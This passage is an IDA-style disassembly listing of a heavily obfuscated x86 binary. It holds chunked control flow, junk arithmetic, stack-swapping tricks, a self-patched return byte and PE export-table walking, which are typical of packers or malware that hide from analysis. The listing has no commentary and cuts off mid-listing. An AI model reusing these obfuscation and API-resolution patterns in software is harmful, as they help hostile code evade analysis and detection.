		xchg	edi, [esp+0]
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_45046B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4443AA

loc_43C157:				; CODE XREF: sub_4443AA:loc_457042j
		push	ecx
		mov	eax, esp
		call	sub_4418C0

loc_43C15F:				; CODE XREF: hvvrg7ie:0044F311j
		jmp	sub_45B938
; END OF FUNCTION CHUNK	FOR sub_4443AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_43C164:				; CODE XREF: sub_43D531+C699j
		jmp	loc_4508A2
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------
		pop	edx
		not	ebx
		jmp	sub_44475F
; ---------------------------------------------------------------------------

locret_43C171:				; CODE XREF: hvvrg7ie:loc_43A2DEj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A230

loc_43C172:				; CODE XREF: sub_44A230+5BE3j
		jmp	loc_44EDB1
; END OF FUNCTION CHUNK	FOR sub_44A230
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_43C177:				; CODE XREF: sub_446D8D+318Aj
		jmp	nullsub_453
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44957E

loc_43C17C:				; CODE XREF: sub_44957E:loc_449586j
		jmp	loc_43A283
; END OF FUNCTION CHUNK	FOR sub_44957E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_43C181:				; CODE XREF: sub_4465A6+FA45j
		xchg	edi, [esp+0]
		jmp	loc_43D90B
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------

locret_43C189:				; CODE XREF: hvvrg7ie:00440DA2j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AE24

loc_43C18A:				; CODE XREF: sub_43AE24+18j
		jmp	loc_44EBAB
; END OF FUNCTION CHUNK	FOR sub_43AE24
; ---------------------------------------------------------------------------
		push	56902C5Eh
		xchg	ebp, [esp]
		mov	eax, ebp
		pop	ebp
		jmp	loc_443480
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_43C19F:				; CODE XREF: sub_445CCD+BED4j
		pop	edx
		and	edx, 6ABA560Ah
		add	edx, 190F3ED5h
		and	edx, 4D600519h
		sub	edx, 1BC44C13h
		call	sub_449194

loc_43C1BD:				; CODE XREF: sub_45541B+4051j
		jmp	loc_44C1E3
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441DAA

loc_43C1C2:				; CODE XREF: sub_441DAA+12j
		add	ebx, 969AFCCh
		add	ebx, ebp
		add	ebx, 1F1556B9h
		mov	[ebx], edx
		pop	ebx
		jmp	loc_450A65
; END OF FUNCTION CHUNK	FOR sub_441DAA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B7B9

loc_43C1D8:				; CODE XREF: sub_43B7B9+15F6Dj
		mov	esi, eax
		call	sub_44CDBE
; END OF FUNCTION CHUNK	FOR sub_43B7B9
; START	OF FUNCTION CHUNK FOR sub_444B29

loc_43C1DF:				; CODE XREF: sub_444B29-67B9j
		jmp	loc_449A70
; END OF FUNCTION CHUNK	FOR sub_444B29
; ---------------------------------------------------------------------------
		jmp	ds:dword_41D0D8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		xor	al, 24h
		mov	edx, esi
		pop	esi
		jnz	loc_44B8F8
		jmp	loc_440674
; ---------------------------------------------------------------------------
		push	esi
		jmp	sub_441C58
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ADA5

loc_43C201:				; CODE XREF: sub_44ADA5:loc_43FEB1j
		lea	eax, dword_4562D4
		push	edx
		mov	edx, eax
		xchg	edx, [esp+8+var_8]
		jmp	loc_45727B
; END OF FUNCTION CHUNK	FOR sub_44ADA5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456CD4

loc_43C212:				; CODE XREF: sub_456CD4-19126j
		popf
		jz	loc_44F755

loc_43C219:				; CODE XREF: sub_456CD4:loc_4404BFj
		shr	eax, 0Fh
		jmp	loc_44286D
; END OF FUNCTION CHUNK	FOR sub_456CD4
; ---------------------------------------------------------------------------

loc_43C221:				; DATA XREF: sub_455087:loc_44AC9Co
		mov	byte ptr [ebp+eax-100h], 0
		push	2010h
		push	0
		jmp	loc_440B3A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_43C235:				; CODE XREF: sub_455087:loc_4587FBj
		mov	eax, [ebp-104h]
		cmp	byte ptr [eax],	0
		jnz	loc_45925A
		jmp	loc_43AEB0
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E56

loc_43C249:				; CODE XREF: sub_447E56:loc_442AB3j
		push	88A34C03h
		pop	ecx
		add	ecx, 5020B10Ah
		or	ecx, 0DABB410Eh
		add	ecx, 25487330h
		jmp	loc_447037
; END OF FUNCTION CHUNK	FOR sub_447E56
; ---------------------------------------------------------------------------
		jmp	ds:off_41D014
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E4A6

loc_43C26C:				; CODE XREF: sub_44E4A6+44C1j
		jmp	loc_43BBBC
; END OF FUNCTION CHUNK	FOR sub_44E4A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440B96

loc_43C271:				; CODE XREF: hvvrg7ie:loc_43B3B9j
					; sub_443695:loc_45287Ej ...
		call	sub_4405AA
; END OF FUNCTION CHUNK	FOR sub_440B96
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_159. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4546E9

loc_43C277:				; CODE XREF: sub_4546E9+4449j
		jmp	loc_447435
; END OF FUNCTION CHUNK	FOR sub_4546E9
; ---------------------------------------------------------------------------
		mov	ds:dword_41D0E0, eax
		lea	eax, nullsub_510
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_510

; =============== S U B	R O U T	I N E =======================================



sub_43C290	proc near		; CODE XREF: sub_40F8D4+2Dp
					; sub_419E67+30p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00441A49 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004424EE SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00442B51 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446279 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A777 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044BAF2 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044E1FB SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045236D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454CE5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455E3E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004590A5 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045ADFA SIZE 0000000A BYTES

		jo	loc_45ADFA
		mov	eax, ds:dword_45AAC4
		or	eax, eax
		jmp	loc_446279
sub_43C290	endp


; =============== S U B	R O U T	I N E =======================================



sub_43C2A3	proc near		; CODE XREF: hvvrg7ie:0043FEE7p
					; hvvrg7ie:00448A13j

; FUNCTION CHUNK AT 00449002 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452F1F SIZE 00000006 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	0AF52679Dh
		pop	ebx
		jmp	loc_449002
sub_43C2A3	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43C2B2	proc near		; CODE XREF: sub_441E23+5569p
					; hvvrg7ie:0044A173j
		xchg	edi, [esp+0]
		pop	edi
		add	ecx, 0B262FF60h
		call	sub_4430E3

loc_43C2C1:				; CODE XREF: sub_454B5C-A18Aj
		jmp	nullsub_293
sub_43C2B2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F6B

loc_43C2C6:				; CODE XREF: sub_442F6B+CB3Bj
		jp	loc_449357

loc_43C2CC:				; CODE XREF: sub_442F6B:loc_448807j
		push	2435F649h
		pop	eax
		and	eax, 5FB898Eh
		cmp	eax, 10B9EEB0h
		jmp	loc_43B144
; END OF FUNCTION CHUNK	FOR sub_442F6B
; ---------------------------------------------------------------------------

loc_43C2E3:				; CODE XREF: hvvrg7ie:loc_43B871j
		jmp	ds:dword_41D194
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B8A5

loc_43C2E9:				; CODE XREF: sub_43B8A5:loc_451CF1j
		jmp	nullsub_19
; END OF FUNCTION CHUNK	FOR sub_43B8A5
; ---------------------------------------------------------------------------

loc_43C2EE:				; CODE XREF: hvvrg7ie:loc_44E1EBj
					; hvvrg7ie:loc_44F5C6j
		jmp	locret_43D1FC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_471. PRESS KEYPAD	"+" TO EXPAND]
		dd 6DC180h, 24048700h, 6CE9D08Bh, 51000117h, 0B7FD68h
					; CODE XREF: sub_44AFD7-2D30j
					; sub_44AFD7:loc_44E0E9j ...
		dd 0E9815965h, 8A41A6FDh, 559FE181h, 0C181DBEEh, 2551EF02h
		dd 0E8240C87h, 1D058h, 4C84E9h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_43C329:				; CODE XREF: sub_456F9F-1183Fj
		jmp	loc_44E39C
; END OF FUNCTION CHUNK	FOR sub_456F9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A1CA

loc_43C32E:				; CODE XREF: sub_45A1CA+1Aj
		popf
		xchg	ebx, [esp+4+var_4]
		jmp	loc_449420
; END OF FUNCTION CHUNK	FOR sub_45A1CA
; ---------------------------------------------------------------------------

loc_43C337:				; CODE XREF: hvvrg7ie:loc_4403DDj
		jl	loc_44FA1B
; START	OF FUNCTION CHUNK FOR sub_440643

loc_43C33D:				; CODE XREF: sub_440643:loc_44F98Fj
					; sub_4484E1+C2CDj
		jmp	loc_4549DF
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F6B

loc_43C342:				; CODE XREF: sub_442F6B+63EDj
		jmp	loc_448352
; END OF FUNCTION CHUNK	FOR sub_442F6B
; ---------------------------------------------------------------------------
		cdq
		push	edi
		jmp	loc_4542D0
; ---------------------------------------------------------------------------

loc_43C34E:				; CODE XREF: hvvrg7ie:0044CD8Ej
		jb	loc_43ED79

; =============== S U B	R O U T	I N E =======================================



sub_43C354	proc near		; CODE XREF: sub_44C072+442Fp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B0D9 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043D2E3 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00445148 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044B960 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EA6A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00454A54 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004576F1 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00458AFC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AEF0 SIZE 0000000A BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	ebp, esp
		push	ecx

loc_43C35B:				; CODE XREF: hvvrg7ie:loc_447949j
		mov	esp, ebp
		jmp	loc_458AFC
sub_43C354	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43C362	proc near		; DATA XREF: sub_43A2A5+9697o
		add	esi, 4D1EF669h
		mov	[esi], eax
		xchg	edx, [esp+0]
		mov	esi, edx
		pop	edx
		jmp	loc_44026B
sub_43C362	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	[eax], edx
		jmp	sub_4421DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6D7

loc_43C37C:				; CODE XREF: sub_44A6D7+339j
		mov	edx, ebx
		pop	ebx
		pop	eax
		mov	ds:dword_457B4C, edx
; END OF FUNCTION CHUNK	FOR sub_44A6D7
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_43C386:				; CODE XREF: sub_458095+6j
					; sub_44059F+19669j
		push	offset loc_44676B
		jmp	loc_4484DC
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------

loc_43C390:				; CODE XREF: hvvrg7ie:0043EDEDj
					; DATA XREF: sub_456F6A-19E53o
		push	0
		call	sub_452AE5
		xchg	ecx, [esp]
		mov	edx, ecx
		pop	ecx
		jmp	loc_44B583
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_43C3A2:				; CODE XREF: sub_446D8D:loc_43E1A3j
		jg	sub_442B3C
		sub	esi, 0F3BBC3B2h
		jmp	loc_4548EC
; END OF FUNCTION CHUNK	FOR sub_446D8D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_195. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44543A

loc_43C3B4:				; CODE XREF: sub_44543A-3C8Ej
		jmp	loc_4430EF
; END OF FUNCTION CHUNK	FOR sub_44543A
; ---------------------------------------------------------------------------
		mov	eax, 147A4491h
		push	ecx
		push	8AE73C3Fh
		pop	ecx
		jmp	loc_458761
; ---------------------------------------------------------------------------

loc_43C3CA:				; CODE XREF: hvvrg7ie:0045A727j
		push	eax

; =============== S U B	R O U T	I N E =======================================



sub_43C3CB	proc near		; CODE XREF: hvvrg7ie:00440D7Cp

arg_0		= dword	ptr  4

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	eax, [esp-4+arg_0]
		call	sub_447DA3
sub_43C3CB	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_439873

loc_43C3D7:				; CODE XREF: sub_44388C:loc_43ED59j
					; sub_439873:loc_445222j ...
		jz	loc_45100E
		mov	ecx, [ebx+3Ch]
		mov	ecx, [ebx+ecx+78h]
		push	offset loc_4523FA
		jmp	loc_45A9A7
; END OF FUNCTION CHUNK	FOR sub_439873
; ---------------------------------------------------------------------------

loc_43C3EE:				; CODE XREF: hvvrg7ie:00453A1Ej
		pop	eax
		and	eax, 0B9E66420h
		cmp	eax, 0CF099C68h
		jmp	loc_44E36F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C072

loc_43C400:				; CODE XREF: sub_44C072:loc_456B43j
		mov	[esi], eax
		push	offset loc_451619
		jmp	nullsub_253
; END OF FUNCTION CHUNK	FOR sub_44C072

; =============== S U B	R O U T	I N E =======================================



sub_43C40C	proc near		; DATA XREF: hvvrg7ie:00445BF5o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043ED2C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004420CE SIZE 00000005 BYTES

		pop	edx
		call	edx
		xor	eax, eax
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		xchg	ebx, [esp-4+arg_0]
		mov	ecx, ebx
		jmp	loc_43ED2C
sub_43C40C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43C421	proc near		; CODE XREF: hvvrg7ie:00445846j
					; sub_44CF7D+3697p

; FUNCTION CHUNK AT 0043D9BE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00444567 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00450CF0 SIZE 0000001A BYTES

		xchg	edi, [esp+0]
		pop	edi
		cmp	dword ptr [ebp-4], 0
		jz	loc_43D9BE
		mov	eax, [ebp-4]
		add	eax, 3Ch
		mov	eax, [eax]
		jmp	loc_450CF0
sub_43C421	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43C43C	proc near		; DATA XREF: hvvrg7ie:00451500o

var_4		= dword	ptr -4

		push	edx
		mov	edx, ebp
		xchg	edx, [esp+4+var_4]
		mov	ebp, edx
		call	sub_43933B
sub_43C43C	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4544AA

loc_43C449:				; CODE XREF: sub_4544AA-1B1E8j
		jmp	loc_45AEFF
; END OF FUNCTION CHUNK	FOR sub_4544AA
; ---------------------------------------------------------------------------
		xchg	edi, [ebp+0]
		jmp	loc_448BBB
; ---------------------------------------------------------------------------

locret_43C456:				; CODE XREF: hvvrg7ie:0044A687j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_43C457:				; CODE XREF: sub_453405j
		push	edi
		push	ebp
		pop	edi
		xchg	edi, [esp+4+var_4]
		mov	ebp, esp
		push	ecx
		jmp	loc_43CC34
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------
		sub	esi, 3A4BC132h
		jmp	loc_447AC7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_43C470:				; CODE XREF: sub_43EB47+13596j
		xchg	edi, [esp+8+var_8]
		push	edi
		push	9A61FF5Dh
		pop	edi
		add	edi, ds:4000F4h
		jmp	loc_43F67C
; END OF FUNCTION CHUNK	FOR sub_43EB47

; =============== S U B	R O U T	I N E =======================================



sub_43C485	proc near		; CODE XREF: sub_440C05+3013j

; FUNCTION CHUNK AT 0045B27D SIZE 0000000D BYTES

		push	ebx
		cmp	esi, 0E76C90F4h
		jmp	loc_45B27D
sub_43C485	endp


; =============== S U B	R O U T	I N E =======================================



sub_43C491	proc near		; DATA XREF: hvvrg7ie:00450305o
		xor	edx, edx
		call	sub_456DE7
		call	sub_456423
		call	nullsub_512
sub_43C491	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43BFCF

loc_43C4A2:				; CODE XREF: sub_454703:loc_43F9D8j
					; sub_43BFCF:loc_458E5Fj ...
		push	offset loc_45130C
		jmp	loc_458D9C
; END OF FUNCTION CHUNK	FOR sub_43BFCF
; ---------------------------------------------------------------------------

loc_43C4AC:				; CODE XREF: hvvrg7ie:004542FDj
		test	edi, edx
		jmp	loc_4545E3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D910

loc_43C4B3:				; CODE XREF: sub_43D910:loc_43CD7Ej
		mov	edx, esi
		pop	esi
		jz	loc_457FFA
		mov	eax, [esp-4+arg_0]
		push	edx
		jmp	loc_457FBD
; END OF FUNCTION CHUNK	FOR sub_43D910
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F50

loc_43C4C5:				; CODE XREF: sub_457F50:loc_44DB95j
		jz	loc_459E8B

loc_43C4CB:				; CODE XREF: sub_4480DC+9j
		jmp	loc_4564FF
; END OF FUNCTION CHUNK	FOR sub_457F50
; ---------------------------------------------------------------------------
		test	edi, ecx
		jmp	loc_4592C9

; =============== S U B	R O U T	I N E =======================================



sub_43C4D7	proc near		; CODE XREF: sub_43B35B+Fj

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 00440339 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004423CB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FB76 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004555BB SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045AA95 SIZE 00000013 BYTES

		push	ebx
		mov	[ebp-4], eax
		push	3B31A240h
		pop	eax
		and	eax, 73CB7114h
		jmp	loc_440339
sub_43C4D7	endp

; ---------------------------------------------------------------------------
		push	7BAD80D6h
		jmp	loc_43E15D
; ---------------------------------------------------------------------------
		jo	loc_43A3E4
		jmp	sub_45AD2D
; ---------------------------------------------------------------------------

loc_43C501:				; CODE XREF: hvvrg7ie:0044DDD2j
		call	sub_4508B6
; START	OF FUNCTION CHUNK FOR sub_4496FA

loc_43C506:				; CODE XREF: sub_4496FA:loc_449707j
		jmp	nullsub_75
; END OF FUNCTION CHUNK	FOR sub_4496FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4589D3

loc_43C50B:				; CODE XREF: sub_4589D3+Cj
		jz	loc_43D6AD
		jmp	loc_44E991
; END OF FUNCTION CHUNK	FOR sub_4589D3
; ---------------------------------------------------------------------------
		dw 8A0Fh
		dd 10007h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B2AC

loc_43C51C:				; CODE XREF: sub_45B2AC:loc_458E9Ej
		add	edx, 153C74Fh
		xchg	edx, [esp+0]
		jmp	loc_45AD41
; END OF FUNCTION CHUNK	FOR sub_45B2AC
; ---------------------------------------------------------------------------
		mov	eax, [esp]
; START	OF FUNCTION CHUNK FOR sub_45B2AC

loc_43C52D:				; CODE XREF: sub_45B2AC-1BBEEj
					; hvvrg7ie:0044DF10j
		call	sub_43E7F3
		retn
; END OF FUNCTION CHUNK	FOR sub_45B2AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_43C533:				; CODE XREF: sub_4465A6+12B20j
		jmp	loc_44D3CB
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_43C538:				; CODE XREF: sub_44D2F8-4890j
		jmp	loc_454737
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_43C53D:				; CODE XREF: sub_450246-11DC7j
		jmp	loc_44D064
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
		dw 3A17h
dword_43C544	dd 0			; DATA XREF: hvvrg7ie:loc_439F96r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C2EA

loc_43C548:				; CODE XREF: sub_44C2EA+8070j
		jmp	loc_457DC8
; END OF FUNCTION CHUNK	FOR sub_44C2EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_43C54D:				; CODE XREF: sub_44388C+Bj
		js	loc_442012
		sub	al, 99h
		mov	edx, [ebp-4]
		push	offset sub_44ABA3
		jmp	loc_443735
; END OF FUNCTION CHUNK	FOR sub_44388C

; =============== S U B	R O U T	I N E =======================================



sub_43C562	proc near		; DATA XREF: sub_458706+15o

; FUNCTION CHUNK AT 0043E95A SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043EC3E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F2E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FF71 SIZE 00000011 BYTES

		xor	eax, 0FD0739A3h
		call	sub_450C5A
		push	ecx
		push	761B3AB6h
		pop	ecx
		rol	ecx, 1Ah
		jmp	loc_43E95A
sub_43C562	endp

; ---------------------------------------------------------------------------

loc_43C57C:				; CODE XREF: hvvrg7ie:00450DD2j
		test	edx, 40EACF7Ah
		jmp	loc_44B83C
; ---------------------------------------------------------------------------

loc_43C587:				; CODE XREF: hvvrg7ie:loc_43FB57j
		rol	edi, 19h
		sub	edi, 0E8564FBh
		jnb	loc_449325
; START	OF FUNCTION CHUNK FOR sub_44AE37

loc_43C596:				; CODE XREF: sub_44AE37+D246j
		jmp	nullsub_373
; END OF FUNCTION CHUNK	FOR sub_44AE37
; ---------------------------------------------------------------------------
		mov	eax, [edx]
		jmp	loc_449320
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4499A7

loc_43C5A2:				; CODE XREF: sub_4499A7+3j
					; sub_4403D4:loc_459176j
		push	ecx
		push	0FFFFFFF1h
		call	sub_455273

loc_43C5AA:				; CODE XREF: hvvrg7ie:loc_44F7F7j
		push	eax
		jmp	loc_454E29
; END OF FUNCTION CHUNK	FOR sub_4499A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_43C5B0:				; CODE XREF: sub_44388C:loc_444F11j
		xor	edx, 1642C609h
		add	edx, 9453187Dh
		add	eax, edx
		pop	edx
		mov	eax, [eax]
		push	ecx
		mov	ecx, eax
		jmp	loc_44C3DC
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4557D4

loc_43C5C9:				; CODE XREF: sub_4557D4-187D6j
		and	eax, 0E355E3CAh
		add	eax, 56699642h
		or	eax, 504AD86Eh
		and	eax, 4210F3C8h
		add	eax, 0EA37B051h
		add	eax, ebp
		add	eax, 0D3B77DD3h
		push	eax
		jmp	loc_44FB4C
; END OF FUNCTION CHUNK	FOR sub_4557D4
; ---------------------------------------------------------------------------

loc_43C5F5:				; DATA XREF: sub_43972A+5o
		push	50FF20BEh
		pop	ecx
		add	ecx, ds:4000FAh
		rol	ecx, 13h
		or	ecx, 33110C4h
		jmp	loc_44FE41
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44772D

loc_43C60F:				; CODE XREF: sub_44772D+FAD7j
		add	ebx, 495539ABh
		mov	ebx, [ebx]
		xchg	ebx, [esp+4+var_4]
		retn
; END OF FUNCTION CHUNK	FOR sub_44772D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_43C61B:				; CODE XREF: sub_448BC0+18j
		jmp	loc_452E3E
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_43C620:				; CODE XREF: sub_453405-15BAAj
		mov	byte ptr [eax+edx], 0
		inc	dword ptr [ebp-4]
		cmp	dword ptr [ebp-4], 100h

loc_43C62E:				; CODE XREF: sub_458095-1B585j
		jnz	loc_459491
		jmp	loc_44D8B6
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAE1

loc_43C639:				; CODE XREF: hvvrg7ie:00440C5Cj
					; sub_45AAE1-65A5j
		rol	ecx, 5
		add	ecx, 0D44C51E8h
		xchg	ecx, [esp+0]
		jmp	sub_43E7F3
; END OF FUNCTION CHUNK	FOR sub_45AAE1
; ---------------------------------------------------------------------------
		xchg	ebx, [ebp+0]
		jmp	sub_45454F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_174. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D47A

loc_43C653:				; CODE XREF: sub_44D47A+5621j
		jmp	loc_44085B
; END OF FUNCTION CHUNK	FOR sub_44D47A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446925

loc_43C658:				; CODE XREF: sub_446925+Cj
		jmp	loc_440425
; END OF FUNCTION CHUNK	FOR sub_446925
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_554. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_43C65E:				; CODE XREF: sub_44059F-262Ej
		jmp	loc_45A17C
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AA1C

loc_43C663:				; CODE XREF: sub_44AA1C-CEABj
		jmp	loc_44C313
; END OF FUNCTION CHUNK	FOR sub_44AA1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FDAE

loc_43C668:				; CODE XREF: sub_43FDAE+Ej
		push	9DF6CBFCh
		pop	esi
		or	esi, 5D93E3F2h
		add	esi, 31C74AA2h
		or	esi, 687BBBA6h
		xor	esi, 0A6FD6EFh
		add	esi, 9AB4B9D7h
		mov	[esi], eax
		jmp	loc_443D99
; END OF FUNCTION CHUNK	FOR sub_43FDAE
; ---------------------------------------------------------------------------
		push	65D31373h
		pop	edx
		and	edx, 5A96444Fh
		rol	edx, 0Ah
		cmp	edx, 93C54F5Eh
		jmp	loc_45714D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_242. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E34F

loc_43C6AE:				; CODE XREF: sub_44E34F:loc_43D83Dj
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_454F0C
		jmp	loc_457328
; END OF FUNCTION CHUNK	FOR sub_44E34F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B2

loc_43C6BF:				; CODE XREF: sub_4490B2+9j
		mov	edx, eax
		call	sub_456DE7
; END OF FUNCTION CHUNK	FOR sub_4490B2
; START	OF FUNCTION CHUNK FOR sub_453BA4

loc_43C6C6:				; CODE XREF: sub_453BA4-DF46j
		call	sub_43A87E
		or	eax, eax
		jmp	loc_451095
; END OF FUNCTION CHUNK	FOR sub_453BA4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4569C6

loc_43C6D2:				; CODE XREF: sub_4569C6:loc_45B197j
		jz	loc_44BB1F
		jmp	loc_442DAD
; END OF FUNCTION CHUNK	FOR sub_4569C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414F6

loc_43C6DD:				; CODE XREF: sub_4414F6+96CEj
		jz	loc_449EA4
		jmp	loc_43D07C
; END OF FUNCTION CHUNK	FOR sub_4414F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44980B

